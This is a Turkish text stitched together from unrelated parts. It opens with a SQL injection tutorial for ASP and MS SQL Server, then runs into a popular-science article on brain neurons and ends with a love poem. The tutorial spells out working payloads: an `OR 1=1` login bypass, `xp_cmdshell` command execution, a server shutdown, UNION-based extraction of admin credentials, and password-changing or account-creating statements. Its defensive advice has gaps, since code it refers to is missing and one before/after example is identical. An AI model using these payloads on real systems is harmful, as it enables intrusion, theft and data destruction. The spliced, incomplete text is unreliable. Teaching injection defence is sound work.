Kullanici ‘Username’ & ‘Password’ verisini Login.asp ye yolladiktan sonra .asp kodunun yapacagi is verilen yoldaki veritabani ile baglanti kurup ilgili tabloda Username ve Password sütünlarinda gönderilen verinin dogrulugunu kontrol etmek olacaktir. Bu islem sonucunda eger sonuç olumluysa kullaniciya; ‘Giris Yapildi’ olumsuzsa; ‘Geçersiz Kullaniciadi & Sifre’ mesaji verilecektir.
Örnekleyecek olursak;

Username : ilkay
Password : 2081

Seklindeki kullanici girdisi asagidaki SQL Deyimini olusturacaktir;

select count(*) FROM Users WHERE Username = ‘ilkay’ AND Password = ‘2081′

Ilk bakista sorun olmayan bir SQL Deyimi… Fakat saldirganin;

Username : ilkay
Password : ‘ OR 1=1–

Seklindeki girdilerle olusturacagi SQL Deyimi ise;

select count(*) FROM Users WHERE Username = ‘ilkay’ AND Password = ” OR 1=1 –’

Olacaktir ki, bu durumda girisin saglanmasi için sart ‘ilkay’ kullanici adina ait sifrenin hiçbirsey* olmasi veya ikinci bir opsiyon olarak 1=1 esitliginin saglanmasidir.

* Hiçbisey = Bosluk

Sonuç : 1=1 esitligi saglandigina göre saldiri basariyla sonuçlanacak ve ‘Giris Yapildi’ mesaji verilecektir.

Not : Microsoft® SQL Server™ ‘–’ imlecinden sonra gelen yersiz kullanilmis tirnak isaretlerini göz ardi edecektir. Ilk bakista basit gibi görünen ve sadece SQL Server’a ait olan bu özellik ilerde örneklerden de anlasilacagi üzere saldirgana büyük kolaylik saglayacaktir..

2.2. Uzaktan Çalistirilmasi Mümkün Olan Prosedürler:

MS SQL Server’a varsayilan sistem hesabindan yaptigimiz baglanti SQL Enjeksiyon saldirisinda muhtemel saldirgana sunucuda saklanan prosedürleri çalistirabilmesi için gerekli haklari taniyacaktir. Saldirganin kullanabilecegi prosedürlerden bir tanesi; ‘master..xp_cmdshell’ olabilir.

Username : ilkay
Password : ‘; EXEC master..xp_cmdshell ‘dir c:’–

Girdileriyle olusacak SQL Deyimi;

select count(*) FROM Users WHERE Username = ‘ilkay’ AND Password = ”; EXEC master..xp_cmdshell ‘dir c:’–’

Sonuç : SQL Server Kullaniciadi ve Sifreyi bulunduran sütunlari arayacaktir bulamadigi için ‘Yanlis Kullaniciadi & Sifre’ mesajini verecektir fakat bu arada arka planda ‘dir c:’ komutunu çalistiracak ve saldirgan C sürücüsünün içerigine ulasacaktir.

2.3. SQL Server Hedef Alinarak Yapilan Saldirilar:

Yönetici haklarina sahip saldirgan silme,ekleme,degistirme…vb gibi komutlari rahatlikla çalistirabilecektir.

SHUTDOWN WITH NOWAIT SQL Server’in kritik komutlarindan bir tanesidir. Komutla beraber SQL Server görevine son verir.

Username : ‘; SHUTDOWN WITH NOWAIT–
Password : [Bos]

Bu girdilerle olusturulan SQL Deyimi;

select Username FROM Users WHERE Username=”; SHUTDOWN WITH NOWAIT; –’ AND Password=”

Sonuç : SQL Server kullaniciadinin bulunamadigi mesajini verecektir. Fakat bununla beraber arka planda diger komutu çalistirdigi için SQL Server kapanacaktir.

2.4. ODBC Hatalarindan Faydalanarak Yapilan Saldirilar:

SQL Server’in verdigi hatalardan faydalanarak veritabanindaki neredeyse tüm bilgilere ulasmak mümkündür.

Hedef; http://Victim/Default.asp?id=10 seklinde ürün ID leri ile çalisan ASP tabanli bir websitesi.

Saldiri SQL Server’in integer ve string cinsinden verileri birlikte gönderememesinden faydalinarak yapilabilir;

Gönderilen ‘10′ sayisina veritabanindan herhangi bir string eklenir.

http://Victim/Default.asp?id=10 UNION select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–

Not: ‘INFORMATION_SCHEMA.TABLES’ sistem tablosu, sistemde bulunan diger tüm tablolar hakkinda bilgi içerir. Deyimde kullanilan ‘TABLE_NAME’ de yine tüm tablo isimlerini içerir.

Olusacak SQL Deyimi;

select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES

String -> Integer dönüsümünü yapamayan SQL Server asagidaki hatayi verecektir.

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘Table1′ to a column of data type int.
/Default.asp, line 5

Hata, saldirgana ‘Table1′ olarak buldugu cevabi integer a çeviremedigini (dolayisiyla veritabanindaki ilk tablo adinin ‘Table1′ oldugunu) belirtmektedir. Saldirgan diger tablolarin adini asagidaki sekilde ögrenebilir…

http://Victim/Default.asp?id=10 UNION select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (’Table1′)–

Veya dogrudan LIKE komutunu kullanarak aradigi seye daha kolay yoldan ulasabilir;

http://Victim/Default.asp?id=10 UNION select TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ‘%/%25Login%/%25′–

SQL Server’in verecegi hata;

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘Admin_Login’ to a column of data type int.
/Default.asp, line 5

Admin_Login adinda bir tablo oldugunu ögrenen saldirgan muhtemelen tablodaki ilk kullaniciadi ve sifreye ulasmak isteyecektir. Izleyebilecegi yol ise;

http://Victim/Default.asp?id=10 UNION select TOP 1 Username FROM Admin_Login–

Hata;

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘ilkay’ to a column of data type int.
/Default.asp, line 5

Bu sekilde ‘admin’ kullaniciadinin varligini dogrulayan saldirganin sifreyi ele geçirmek için kullanacagi girdi;

http://Victim/Default.asp?id=10 UNION select TOP 1 Password FROM Admin_Login WHERE Username=’ilkay’–

Hata;

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘2081′ to a column of data type int.
/Default.asp, line 5

Sonuç :
Username : ilkay
Password : 2081

2.5. Veritabanina Ekleme Yapma veya Veri Düzenleme:

Kullaniciadi ve sifre bilgisine ulasan muhtemel saldirgan benzer yöntemleri ve UPDATE,insert komutlarini kullanarak sifreyi degistirebilir veya daha temizi baska bir kullanici hesabi açabilir…

http://Victim/Default.asp?id=10; UPDATE ‘Admin_Login’ SET ‘Password’ = ‘NewPwd’ WHERE Username=’ilkay’–

Yeni bir kullanici hesabi için;

http://Victim/Default.asp?id=10; insert INTO ‘Admin_Login’ (’UserID’, ‘Username’, ‘Password’, ‘Details’) VALUES (666,’Desperate_Cry’,'2081′,’N /A’)–

3. Nasil Korunmali? – ‘Aksi Dogrulanincaya Kadar Tüm Kullanici Girdileri Kötüdür…’

Gelebilecek SQL Enjeksiyon saldirilarindan korunabilmek için alinan önlemlerde temel alinmasi geren nokta… ‘Aksi dogrulanincaya kadar tüm kullanici girdileri kötüdür!’.

3.1. Kullanici Haklarinin Sinirlandirilmasi

Yaygin olarak yapilan hata; Web Server dan SQL Server a yapilan baglantilarda varsayilan sistem hesabi kullanilmasi… Bu sekilde yönetici haklarina sahip olan saldirgan örneklerde de görülebilecegi üzere istegi komutu çalistirip istedigi ekleme,silme,düzeltme eylemini gerçeklestirebilecektir. Bunu yerine yapilmasi gereken yeni bir kullanici hesabi olusturup kullanicinin çalistirabilecegi komutlari sinirlandirmak olacaktir.

Mesela sitenizden ürünlerinizin incelenmesine ve bunlar arasindan siparis verilmesine izin verecekseniz, ‘web_user’ gibi bir kullanici adi olusturup ürünleri incelemek için; ürünler sütununda sadece ’select’ kullanimina ve siparisleri için; siparisler sütununda sadece ‘insert’ kullanimina izin vermeniz uygun olacaktir.

3.2. Girdilerde Tirnak Imleçlerinin (’) Kötü Amaçli Kullaniminin Engellenmesi

Yaygin SQL Enjeksiyon saldirilari SQL deyimlerinin girdilerdeki gereksiz (’) tirnak isaretleri yardimiyla yeniden olusturulmasi sayesinde yapilir.

Küçük bir filtreleme fonksiyonu veya tek tirnagi çift tirnaga çeviren bir fonksiyon muhtemel bir saldiriyi engellmek için yeterli olabilir.

ASP Kullanarak girdileri kontrol ederek degistiren bir fonksiyon kolaylikla yazilabilir;

Bu fonksiyonu bastaki örnekte kullanirsak;

select count(*) FROM Users WHERE Username=’ilkay’ AND Password=” OR 1=1 –’

seklinde olan deyim…

select count(*) FROM Users WHERE Username=’ilkay’ AND Password=” OR 1=1 –’

‘e dönüsecektir.

3.3. Form Girdilerinden Gereksiz Karakterlerin Elenmesi

SQL Enjeksiyon saldirilari genelde ‘;, –,select, insert ve xp_’ gibi karakterlerin-kelimelerin kullanilmasiyla yapildigi için gönderilecek girdinin önce bir filtreleme fonksiyonundan geçirilmesi muhtemel zayifligi engelleyebilir.Örnegin kullanicidan E – Mail adresini girmesi isteniyorsa harfler ve sayilarin yaninda sadece ‘ @,-,_,.’ karakterlerinin kullanilmasina izin verilmelidir.

Ve sunucuda saklanan xp_cmdshell ve xp_grantlogin gibi genel prosedürler,C/C++ tabanli DLL ler, kullanici tarafli fonksiyonlar…vb, izole edilmis bir sunucuya tasinmalidir. Bazi zararli kelime-harfleri filteleyen ASP fonksiyonu asagida örneklenmistir;

Tirnak degistirme fonksiyonu ve filtreleme fonksiyonu beraber kullanilirsa;

select Username FROM Users WHERE Usename=”; EXEC master..xp_cmdshell ‘dir c’; –’ AND Password=”

Seklindeki SQL Deyimi…

select Username FROM Users WHERE Usename=” EXEC master.. cmdshell ‘dir c:’ ‘ AND Password=”

e dönüsecektir ki bu da herhangi bir kayit bulumadigi hatasini vermekten öteye gitmeyecektir.

Bu fonksiyonu kullanicidan gelen bütün girdilere, adres satiri ifadelerine ve çerezlerden gelen tüm veriye uygulamamiz gelebilecek saldirinin önüne geçecektir.

3.4. Girdi Uzunlugunun Sinirlandirilmasi

Veritabanindaki ayrilan alanin uzunlugu 10 karakterlikse, formunuzda bu alan için 50 karakter sigan bir text kutusuna sahip olmaniz sakincali olabilir. Ve mümkün oldugu kadar girdi uzunluklarini kisa tutmak muhtemel saldiriyi engellemek için önlem sayilabilir.

3.5. Girdi Cinsinin Kontrol Edilmesi

Formunuzdan girilen verinin istediginiz türden bir veri olup olmadigini kontrol eden bir fonksiyon kötü amaçli kullanimlarda saldirganin kullanabilecegi harf/sayi seçenegini kisitlayacaktir. Mesela, eger Ürün ID si için formunuzdan girdi aliyorsaniz girdinin sayisal bir ifade olup olmadigini kontrol eden bir fonksiyon fayda saglayacaktir.

3.6. Girdi Cinsinin Kontrol Edilmesi

Formunuz araciligi ile topladiginiz verileri yollarken mutlaka ‘POST’ metodunu kullanin ki kullanicilariniz adres çubugunda girdikleri verilerle beraber form degerlerini gördüklerinde akillarina farkli fikirler gelmesin.

4. Son Söz – ‘Herzaman bir adim önde!’

Aldiginiz güvenlik önlemleri veya (en iyi ihtimalle) yazip da kullanmayi bir aliskanlik haline getiremediginiz güvenlik politikalari sizi güvenlik problemlerine karsi koruyabilir mi? Eger güvenlik ile ilgili problemleri yönetmeyi süreç temelli bir güvenlik bilinci içerisinde ele almiyorsaniz hiçbir güvenlik ürünü, bir güvenlik kaybina ugramanizi engelleyemez.

Bilgi sistemleri altyapinizi tasidiklari güvenlik zaaflarina karsi düzenli olarak kontrol ettirmek, risklerinizi takip etmek, dogru teknolojiyi dogru yerde ve dogru sekilde kullanmanizi saglayacak güvenlik politikalarinizi olusturup güvenlik probleminizi sürekli yönetebilecek olgunluga ulasmak hedeflenmelidir. Bilgi sistemlerinin önemli bir kismini olusturan uygulamalarin tasiyabilecegi güvenlik sorunlari uzun süredir ihmal edilmelerinden dolayi, günümüzün en popüler sistem sizma noktalarini teskil etmektedirler. Bu nedenle uygulama güvenligine iliskin gereken önemi vermeniz, güvenlik denetimi yaptirmaniz ve kurumunuzun bilgi güvenligi yönetim sistemini olusturmaya bir yerinden baslamanizi öneriyorum…

Şimdi sıra geldi web uygulamalarınızı nasıl yazmanız ve yazmamanız gerektiğine.
login.aspx sayfamızda yer alan Button’un OnClick olayına şu şekilde kod yazılmış olduğunu farzedelim.

Eğer kullanıcı kendi kullanıcı adı ve şifresini girerse her şey normal şekilde sürer. Fakat eğer iyi yazılmamış bir login sayfasında aşağıdaki gibi bir ifade girilirse ne olur görelim.

‘or 1=1–

şeklinde bir Sql ifadesi kullanıcı adının girileceği TextBox’a girilir ve şifre kısmına da rastgele bir değer girilirse, veritabanımızdaki tabloda böyle bir kullanıcı olmasa bile yetkilendirme işlemi başarılı olacaktır. Çünkü ‘or 1=1– ifadesinin TextBox’a girilmesi sonucu sorgu ifadesi şu şekle dönüşmüş olur.

Select * From users Where username = ‘ ‘or 1=1–’ AND password = ‘”+ txtpassword.Text +”‘

Kullanıcı adını yazdığımız TextBox nesnesine girilen ‘or 1=1– ifadesinde yer alan — işaretlerinin anlamı; — işaretlerinden gelen sonraki ifadeleri yoksay olacaktır. Yani sonuç olarak ifademiz;

Select * From users Where username = ‘ ‘or 1=1–

şekline dönüşecektir.Bu ifadede yer alan or 1=1 ifadesi sürekli doğru sonucu vereceğinden sonuç olarak sorgu işlemi bir kayıt döndürecektir. Bizim if döngümüzde yer alan dr.Read() ifadesi de true değerini alacağından if deyimi çalıştırılacak ve kullanıcı Authenticate işlemini başarı ile geçecektir.

Peki bu Sql Injection saldırısının çalışmasını sağlayan hatalar neydi? Kodumuzu satır satır inceleyelim.

string strCnx = ConfigurationSettings.AppSettings["BadconnStr"];
SqlConnection conn = new SqlConnection(strCnx);

bu ifadede BadconnStr değerini Web.config sayfamızdan almaktayız. Web.config sayfamızda yer alan ConnectionString ifademiz şu şekildedir.

Bu ConnectionString ifadesindeki hata veritabanına sa olarak bağlanmamızdır. Hiçbir zaman veritabanına sa kullanıcısı olarak bağlanmayın. Çünkü sa veritabanı üzerinde çok yüksek haklara sahiptir. Oysa bize gerekli olan sadece SELECT sorgusu.

Diğer bir hata ise sorgu işleminin dinamik olarak yapılması. Eğer bu şekilde dinamik olarak SQL sorguları yaratılırsa yukarıda girilen ‘or 1=1– ifadesinin girilmesi ile çok büyük güvenlik açıklarına neden olursunuz. Peki ne yapacağız. Yukarıda bahsettiğim prensiplere göre parametre olarak veri göndermeli veya Stored Procedure kullanmalıyız.

Aslında yukarıda TextBox’lara girilen değerleri de kontrol etmemiz gerekir. Yine aynı şekilde TextBox’ın MaxLength özelliğinin mutlaka kısıtlanması gerekir. Yani TextBox’lara sınırsız karakter girilmesini önlemeliyiz. TextBox’lara girilebilecek özel karakterleri de kontrol etmeliyiz. Yani ‘ ” – + # % & gibi bir çok karakterlerin girilmemesini sağlamalıyız.

Sadece ‘or 1=1– ifadesinden farklı Sql Injection saldırıları da olabilir. Örneğin yine kullanıcı adını girdiğimiz TextBox nesnesinin içine,

‘; UPDATE users SET password = ‘deneme’ WHERE username = ‘mehmet’ —

ifadesi de girilebilir. Peki bu Sql Injection ne gibi zararlara neden olur?

Bu ifade ile çoklu Sql deyimleri noktalı virgül yardımı ile aynı anda çalıştırılabilir. Bu ifade ile users tablosunda yer alan kullanıcı adı mehmet olan kişinin şifresini deneme olarak değiştiriyor. Eğer yukarıdaki gibi kötü yazılmış bir kod varsa bu işlem başarı ile gerçekleştiriliyor. Yine aynı şekilde buna benzer bir ifade ile, veritabanında yeni kullanıcılar yaratılabilr, bir tablo silinebilir, veya herhangi bir stored procedure yazılarak çok farklı işlemler gerçekleştirilebilir. Bunu önlemenin yolu veritabanına bağlantı yaptığımız ConnectionString’inde yer alan user’a sadece ve sadece gerekli izinler verilmelidir. Örneğin, burada user’ın sadece SELECT ifadesi için izin verilseydi hiç bir sorun olmayacaktı.

Şimdi daha güvenli login işleminin nasıl gerçekleşeceğini görelim.

Daha Güvenli Login Sayfamız

Öncelikle sayfamızın tasarım kısmının neye benzediğine bakalım. Daha iyi görebilmek için şeklin üzerine tıklayıp büyütebilirsiniz

LOGIN Butonuna tıkladığımızda çalışacak kodu görmeden önce Web.config dosyasında yer alan ConnectionString ifadesini görelim.

Button’umuzun OnClick olayında çalışacak kod ise şu şekildedir.

Yukarıda makalenin ilk başında bahsettiğim 5 temel prensibin hepsi bu login işleminde uygulandı. TextBox nesnelerine girilebilecek max karakter sayısının kısıtlanması ile çalışabileck Sql deyimleri girilemez. Aynı şekilde RegularExpressionValidator ifadeleri ile özel karakterlerin girilmesi önlenlenmiş oldu. Yine ConnectionString ifademizde benim yarattığım bir kullanıcı ile bağlanılıyor. Bu kullanıcıya sadece StoredProcedure’leri çalıştırılmasına izin veriliyor. Böylece başka herhangi bir sql komutunun çalışmasına olanak tanınmıyor. Çünkü veritabanına bağlanan kullanıcının yapabildikleri kısıtlanmıştır. SqlCommandType’in özelliği Stored Procedure olarak ayarlanmış ve böylece dinamik SQL ifadelerinin kullanılması engellenmiş olur. Stored Procedure’e aktarılan parametrelerde şifrelenerek veritabanında, şifrelenmiş olarak duran kayıtlarla karşılaştırlır.

Elbette web uygulamasının içerisinde, login sayfasından farklı sayfalarda yer alan TextBox nesneleri ile kötü niyetli kullanıcılar veritabanımıza dolayısıyla web uygulamamıza zarar verebilirler. Örneğin, herkesin bildiği site içerisinde arama yapabilmemizi sağlayan TextBox nesnelerine girilen değerlerde kontrol edilmelidir.

Bu makalenin içerisinde yer alan kodları daha iyi anlayabilmek için, makale içinde geçen bazı konuları (FormsAuthentication, Verileri Şifreleme, RegularExpressionValidator, Stored Procedure) yine aspnedir.com sitesinden okumanızı tavsiye ederim.

Beynimizin Yalnızca % 10’unu Kullandığımız Söylencesi
Öncelikle sorunuzun başında belirttiğiniz varsayıma göz atalım isterseniz: “Beynimizin çok düşük bir yüzdesini kullanırız.” Yaklaşık bir asır önce ortaya atılan bu iddianın kaynağı bazı bilim insanlarının söylem ve bulgularının yanlış yorumlanıp çarpıtılmasına dayanıyor. Bugün, sinir bilim ve beyin görüntüleme tekniklerindeki gelişmeler öyle gösteriyor ki, beynimizdeki tüm sinirler çeşitli eylemler sırasında aktive oluyor. Daha açık bir deyişle, kullanmadığımız herhangi bir sinir ağı bulunmuyor. Konuyla ilgili bir başka yaklaşımsa sinir hücrelerinin herhangi bir uyarıcı almadıklarında dejenere olarak işlevselliklerini kaybediyor olma özellikleri. Örneğin, görsel sistem. Gelişmenin erken dönemlerinde göz sinirleri yeterli uyarıcıya maruz bırakılmadıklarında görme yetisi kayboluyor. Benzer şekilde, eğer ki beynimizde kullanılmayan sinir ağları bulunsaydı, işlevselliklerini kaybetmiş olmalarını beklememiz gerekirdi. Fizyolojik kanıtlar bir yana, iddia evrimle de uyuşmuyor. Aktif olmayan, hayatta kalma mücadelemize katılmayan sinir ağları içeren büyük bir beyin evrimsel gelişimle de bağdaşmıyor.

ANCAK

Olgun haldeki sinir hücrelerinin (yani bilgi depolayan nöronların) kendi kendilerini yenileyebilme özelliklerini yitirmiş olmaları gibi bir durum söz konusu. Bu nedenle de, herhangi bir darbe ya da yaşlanma sonucu kaybedilen sinirler beyin kapasitesini doğal olarak olumsuz yönde etkiliyor.

Beyindeki Sinir Hücreleri Gerçekten de Kendilerini Yenileme Yetisinden Yoksun mu?
Beyindeki sinir hücrelerinin kendilerini yenileyebilme yetisinden yoksun olduklarını gösteren çalışmaların öncüsü 1960’larda yaptığı çalışmalarla ismini duyuran bir sinir bilimci: Dr. Pasko Rakic. Nitekim felç ya da diğer beyin zedelenmelerinde hastaların kaybettikleri konuşma ve yürüme gibi yetileri daha sonradan tekrar edinememeleri de bu bulguları destekler nitelikte. Ancak başlangıcı 1965 yılında sıçanlar üzerinde yapılan deneylere dayanan ve son yıllarda hız kazanan bir takım çalışmalar, beyindeki bazı bölgelerde sinir hücrelerinin yenilenebildiğini gösteriyor. Özellikle de belleksel işlevleri olan hippokampüs bölgesi ile makaklar üzerinde çalışılan üst düzey bilişsel işlemlerden sorumlu ve evrimsel gelişimde son sırada yer alan düşünme, koklama ve duyma ile ilişkili korteks bölgelerinin kök hücreler sayesinde sinirsel yönden yenilenebildikleri bulgular arasında. Ancak bilim insanları, bu çalışma sonuçlarının Alzheimer ya da Parkinson gibi sinir hücreleri kaybı içeren bir takım hastalıkların tedavisinde kullanılabilmesi için klinik ve uygulamaya yönelik daha çok çalışma yapılması gerektiğini söylüyorlar.

Gelelim Sentrozomlarla Sinir Hücreleri Arasındaki İlişkiye…
Sinir hücresinin başka bir hücre üretme olasılığının kalmadığı gelişim aşamasında sentrozoma rastlanmıyor. Her ne kadar bazı araştırmacılar, yaralanmaların olduğu birtakım yetişkin beyni bölgelerinde sentrozoma rastlamış olduklarını rapor etmişlerse de sonraki araştırmalar bu bulguları pek de kanıtlar nitelikte değil. Sinir hücreleri, gelişim dönemleri içerisinde özelleştikçe, çoğalma yetilerini de kaybediyorlar. Bölünme yetisinin yitiminin, meydana gelebilecek bölünmelerin, mevcut sinaps ağlarının da bozulmasına yol açabileceğinden evrilmiş olabileceği düşünülüyor.

Sinir Hücrelerinde Sentrozom Görevi Görebilecek Bir Yapı Oluşturulursa, Kendilerini Yenileyebilme Özelliğini Edinebilirler mi?
Eğer ki sinir hücrelerine böyle bir müdahalede bulunacak olursak, tekrar bölünebilme özelliği kazanacaklardır. Ancak uzmanlar, bu yöntemin tıp uygulamalarında niçin kullanılamayacağına dair iki önemli noktaya işaret ediyorlar:
1.) Eğer ki, sentrozom yapısını kaybetmiş bir hücrede bu yapıyı tekrar oluşturursak, hücre kontrolsüzce çoğalmaya başlıyor. Tıpkı kanser hücreleri gibi. Bu nedenle de bu uygulama, tümör oluşumlarına yol açıyor.
2.) Eğer ki, sentrozom yapısı yalnızca embriyonal dönemde korunan hücrelerde (örneğin, sinir hücreleri) bu yapı müdahale ile sürekli hale getirilirse, hücreler özelleşme durumu göstermiyorlar. Çünkü hücrelerdeki özelleşme, sentrozom yapısının kaybından sonra gerçekleşiyor.

Kaynak : Tübitak – İnci Ayhan

Kopardın

Bir hicran çölüne bıraktın beni
Kalbine girdiğim yolu kopardın
Yaydın üzerime yalan gölgeni
Adını andığı dili kopardın

İçimden boşluğa savruldu külün
Hüznün ateşiyle yandı kakülün
Yıllardır ruhumda öten bülbülün
Her seher konduğu dalı kopardın

Uzattıkça sana boş ellerimi
Birer birer yıktın hayallerimi
Bilmem, ölü müyüm, yoksa diri mi
Saçımdan sn siyah teli kopardın

Gönlümde aşkınla hergün yeşeren
Göğü yıldız yıldız önüme seren
O güzel, bembeyaz gülü kopardın
Aynasında yalnız seni gösteren

Nurullah Genç